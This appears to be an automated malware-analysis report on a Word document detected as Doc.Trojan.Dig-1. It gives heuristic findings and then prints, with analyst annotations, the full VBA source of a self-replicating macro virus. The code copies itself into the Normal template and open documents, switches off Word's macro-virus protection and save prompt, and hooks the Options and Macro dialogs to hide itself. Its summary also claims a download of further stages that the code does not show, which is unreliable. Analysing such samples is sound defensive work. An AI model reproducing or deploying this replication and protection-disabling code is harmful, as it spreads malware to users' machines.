MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro markers and a VBA AutoOpen macro in a module named 'BillyBull'. The AutoOpen subroutine exports its own module source to a temporary file named '~WRD000^.tmp' and then imports it into whichever of the Normal template or the active document does not yet contain it, indicating an attempt to establish persistence and ensure continued execution. This behavior is characteristic of macro-based malware designed to download and execute further stages.
Heuristics 6
-
ClamAV: Doc.Trojan.Dig-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Dig-1
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering — critical — OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
dc.ReplaceLine 2, "const NStat=" & NorStat -
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
Sub AutoOpen() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
pth = Environ("temp") & "\~WRD000^.tmp" -
Legacy WordBasic macro-virus markers — high — OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5825 bytes |

SHA-256: 08159dd86ca0dabb12da1fb5e0ff97459d9405f5fb283c001ca2037c92f61484

Detection — ClamAV: Doc.Trojan.Dig-1

Obfuscation or payload: unlikely
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BillyBull"
' Two modules are concatenated in this extraction: the Attribute block above belongs to
' the document's ThisDocument class module (its attributes mark it as derived from the
' Normal template); everything from the "BillyBull" VB_Name line onward is the standard
' module that carries the macro-virus code and is the unit that gets copied around.
Option Explicit
' Module-level state. These two constants are rewritten in place at runtime by
' ToolsOptions (CodeModule.ReplaceLine 2 / 3), which stores the user's last-seen
' SaveNormalPrompt / VirusProtection settings here so they can be shown back later.
Const NStat = 1
Const VStat = 1
'Copyright © 2001 by GremMe&Zergo from dd!Actor.
'All rights reserved.
Sub AutoOpen()
' Auto-executing entry point: Word runs this when the document is opened.
' This is the replication routine behind the report's self-replication finding.
' It copies the "BillyBull" module between the Normal template and the active
' document through the VBE object model (VBComponents Export / Import).
' First neutralise Word's macro-security settings and hide the VBE (see RunMeAldays).
RunMeAldays
Dim pth As String, i As Byte, dc As Object
Dim NInst As Boolean, AInst As Boolean
' Staging file in %TEMP% for the exported module source; this Environ() call is
' the OLE_VBA_ENVIRON heuristic hit.
pth = Environ("temp") & "\~WRD000^.tmp"
' Pass 1: is the module already present in the global template? If so, export its source.
Set dc = NormalTemplate.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "BillyBull" Then
NInst = 1
dc(i).Export pth
End If
Next i
' Pass 2: the same check against the currently open document.
Set dc = ActiveDocument.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "BillyBull" Then
AInst = 1
dc(i).Export pth
End If
Next i
' The side that does NOT yet carry the module becomes the import target.
If AInst = True And NInst = False Then Set dc = NormalTemplate
If AInst = False And NInst = True Then Set dc = ActiveDocument
If AInst = False Or NInst = False Then
' NOTE(review): if neither side has the module, dc still holds the VBComponents
' collection from pass 2, and there is no On Error handler in this Sub, so the
' dc.VBProject call below presumably aborts with a runtime error in that case.
dc.VBProject.VBComponents.Import pth
' Persist the modified project (template or document) to disk.
dc.Save
' If Mid(ActiveDocument.FullName, 2, 1) = ":" Then dc.Save
' Remove the staging file.
Kill pth
End If
End Sub
Sub AutoExec()
' Auto-macro that Word runs at application start-up when the module lives in the
' global template. Only re-applies the security-disabling settings; no replication here.
RunMeAldays
End Sub
Sub FileSave()
' Overrides the built-in File > Save command. Re-runs the replication routine on
' every save, then performs the real save so the user notices nothing.
' The error handler is commented out, so any runtime error in AutoOpen propagates here.
'On Error Resume Next
AutoOpen
' RunMeAldays
' Pricol is a no-op in this sample (its body is entirely commented out).
Pricol
ActiveDocument.Save
End Sub
Sub FileSaveAs()
' Overrides the built-in File > Save As command. Same pattern as FileSave, but
' with errors suppressed, and it ends by showing the genuine Save As dialog.
On Error Resume Next
AutoOpen
' RunMeAldays
Pricol
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub ToolsOptions()
' Overrides the built-in Tools > Options command. Purpose: let the user open the
' dialog without revealing that macro-virus protection has been switched off,
' record whatever the user selects, then switch the protections off again.
Dim dc As Object
Dim VirStat As Byte
Dim NorStat As Byte
On Error Resume Next
' Temporarily restore the user's last-known settings (module constants NStat / VStat)
' so the dialog displays the values the user expects to see.
Options.SaveNormalPrompt = NStat
Options.VirusProtection = VStat
Dialogs(wdDialogToolsOptions).Show
Set dc = ActiveDocument.VBProject.VBComponents("BillyBull").CodeModule
' Capture the user's choices from the dialog...
If Options.SaveNormalPrompt = True Then NorStat = 1
If Options.VirusProtection = True Then VirStat = 1
' ...and write them back into this module's own source. Lines 2 and 3 of the
' module are the Const NStat / Const VStat declarations (the Attribute lines are
' presumably not counted by CodeModule). This self-modification is the matched
' line for the OLE_VBA_MACRO_VIRUS_REPLICATION finding.
dc.ReplaceLine 2, "const NStat=" & NorStat
dc.ReplaceLine 3, "const VStat=" & VirStat
' Force both protections off again regardless of what the user chose.
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
' Save the modified global template and mark it clean so Word raises no prompt.
NormalTemplate.Save
NormalTemplate.Saved = True
End Sub
Sub ToolsMacro()
' Overrides the built-in Tools > Macro command (the macro manager). While the
' dialog is open, the module's code is exported to the temp file and blanked in
' both projects so the user sees an empty module; it is restored afterwards.
' Uses GoSub/Return to the line labels 10 and 20 as local subroutines. Hooking
' ToolsMacro is one of the legacy markers the OLE_LEGACY_WORDBASIC_MACRO_VIRUS
' heuristic looks for.
Dim i As Byte, n As Integer, pth As String
Dim NInst As Boolean, AInst As Boolean, Nsav As Boolean, Asav As Boolean, res As Boolean
Dim dc As Object, dcN As Object, dcA As Object
' Debugging leftover: a visible message box appears before the dialog.
MsgBox ("toolmacro")
' Every failure below is silently ignored.
On Error Resume Next
pth = Environ("temp") & "\~WRD000^.tmp"
Set dcN = NormalTemplate.VBProject.VBComponents
Set dcA = ActiveDocument.VBProject.VBComponents
' Detect whether the module is present in the template, then in the document
' (subroutine 10 sets res and exports the module if found).
Set dc = NormalTemplate.VBProject
GoSub 10
NInst = res
' NOTE: res is never reset between the two calls, so once the template is found
' infected, AInst also reads as True even if the document is clean.
Set dc = ActiveDocument.VBProject
GoSub 10
AInst = res
' Where present, export and blank the module (subroutine 20), remembering the
' Saved flag and setting it so the edit does not trigger a save prompt.
If NInst = True Then
Set dc = dcN
GoSub 20
Nsav = NormalTemplate.Saved
NormalTemplate.Saved = 1
End If
If AInst = True Then
Set dc = dcA
GoSub 20
Asav = ActiveDocument.Saved
ActiveDocument.Saved = 1
End If
Dialogs(wdDialogToolsMacro).Show
' Restore the exported code once the dialog closes, then put the Saved flags back.
dcN("BillyBull").CodeModule.AddFromFile pth
dcA("BillyBull").CodeModule.AddFromFile pth
' dcN / dcA are VBComponents collections, not components; these two calls
' presumably raise and are swallowed by On Error Resume Next.
dcN.CodeModule.AddFromFile pth
NormalTemplate.Saved = Nsav
dcA.CodeModule.AddFromFile pth
ActiveDocument.Saved = Asav
Kill pth
Exit Sub
10:
' Subroutine 10: dc is a VBProject. Scan its components for "BillyBull"; on a
' match, flag res and export the module source to pth.
For i = 1 To dc.VBComponents.Count
If dc.VBComponents(i).Name = "BillyBull" Then
res = 1
dc.VBComponents(i).Export pth
End If
Next i
Return
20:
' Subroutine 20: dc is a VBComponents collection. Export (presumably fails on a
' collection and is suppressed), then delete every line of the module's code.
dc.Export pth
n = dc("BillyBull").CodeModule.CountOfLines
dc("BillyBull").CodeModule.DeleteLines 1, n
Return
End Sub
Sub ViewVBCode()
' Overrides the View > Code command. Most of the body is commented-out
' experimentation; the live code looks for a component named "BillyBull1"
' (not "BillyBull", the module name seen in this sample), so the loop body
' appears never to match here. Treat this as unfinished development residue.
Dim i As Byte, j As Byte
Dim n As Integer, pth As String
Dim dc As Object, dcN As Object, dcA As Object
'If Dir("c:\autoexec.bat") <> "" Then
' If FileLen("c:\autoexec.bat") <> 777 Then
' RunMeAldays
' Pricol
' Exit Sub
' Else
'Dialogs(wdDialogToolsMacro).Show
Set dc = NormalTemplate.VBProject
' Application.VBE.MainWindow.Visible = False
' Live line: shows the VBA editor window, the opposite of what RunMeAldays does.
Application.VBE.MainWindow.Visible = True
'NormalTemplate.VBProject.VBComponents.Import ("C:\module1.")
'NormalTemplate.VBProject.VBComponents.Item(2).Export ("qqq")
'NormalTemplate.VBProject.VBComponents.Remove (NormalTemplate.VBProject.VBComponents.Item(2))
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "BillyBull1" Then
Set dc = NormalTemplate.VBProject.VBComponents.Item(i)
' Blank the matched module, then insert a single junk line.
n = dc.CodeModule.CountOfLines
dc.CodeModule.DeleteLines 1, n
' Assigning to a method call is unusual syntax; intent unclear, and unreachable
' in this sample unless a "BillyBull1" component exists.
NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.InsertLines(1, "wwww") = "qq"
' NormalTemplate.VBProject.VBComponents.Remove
' NormalTemplate.VBProject.VBComponents.Remove (NormalTemplate.VBProject.VBComponents.Item(i))
End If
Next i
' Mark the template clean so no save prompt appears.
NormalTemplate.Saved = 1
'Set dc = NormalTemplate.VBProject.VBComponents("BillyBull").CodeModule
'For i = 1 To dc.VBComponents.Count
' If dc.VBComponents(i).Name = "BillyBull" Then
' For j = 1 To Application.VBE.Windows.Count
' Application.VBE.Windows(1).Visible = False
'' Application.VBE.Windows(j).Visible = False
' Next j
'' NormalTemplate.VBProject.VBComponents(i).VBE.Windows.
' End If
'Next i
' Application.VBE.MainWindow.Visible = True
' End If
'End If
End Sub
Sub RunMeAldays()
' Shared routine called from AutoOpen and AutoExec: switches off the controls
' that would let the user interrupt or notice the macro. This is the
' "AV tampering" half of the report's self-replication / AV-tampering finding.
' Ctrl+Break can no longer stop running macro code.
Application.EnableCancelKey = wdCancelDisabled
' Legacy WordBasic call; with argument 0 this presumably re-enables auto macros — confirm
' against the WordBasic reference.
WordBasic.DisableAutoMacros 0
' Turns off Word's macro-virus warning dialog.
Options.VirusProtection = 0
' Normal.dot is saved silently, so changes to the global template persist without a prompt.
Options.SaveNormalPrompt = 0
' Hides the VBA editor window.
Application.VBE.MainWindow.Visible = False
End Sub
Sub Pricol()
' Called from FileSave and FileSaveAs. Every statement is commented out, so this
' is currently a no-op; the comments show a planned payload that would have set
' all page margins to 2.5 inches and cleared the document's undo history.
' ActiveDocument.PageSetup.LeftMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.RightMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.BottomMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.TopMargin = InchesToPoints(2.5)
'
' ActiveDocument.UndoClear
End Sub